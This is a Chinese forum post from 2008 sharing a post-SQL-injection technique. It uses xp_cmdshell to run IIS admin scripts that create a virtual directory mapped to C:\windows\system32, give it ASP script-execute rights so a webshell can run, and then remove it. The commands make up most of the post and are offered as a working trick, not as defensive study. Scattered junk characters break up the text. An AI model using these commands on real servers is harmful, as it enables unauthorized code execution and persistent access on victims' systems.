|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:, ?6 d9 d) u: K# G7 D( R) T& J9 S
/ E5 B! v8 ?) _/ ` c9 Q- F7 I0 D
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"': a# ]8 @& m5 H! F
建立虚拟目录win,指向c:\windows\system32: y# @" v4 K$ a- n/ l5 Y
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
6 K) |4 X/ a. O) F! G( t% x让win句有解析asp脚本权限4 V8 }7 c: h7 V" o" {
8 n9 L, y3 Q" I" F: o- g' ?4 n
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"5 h$ U# U1 o0 Y/ d5 r
删除虚拟目录。0 X J& } A. l. Z+ J" F( Z
找不到web绝对路径的一种解决办法,
2 |; I2 E4 S, f& ]% A. T8 X! b- P( y* N1 l6 E0 r
403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
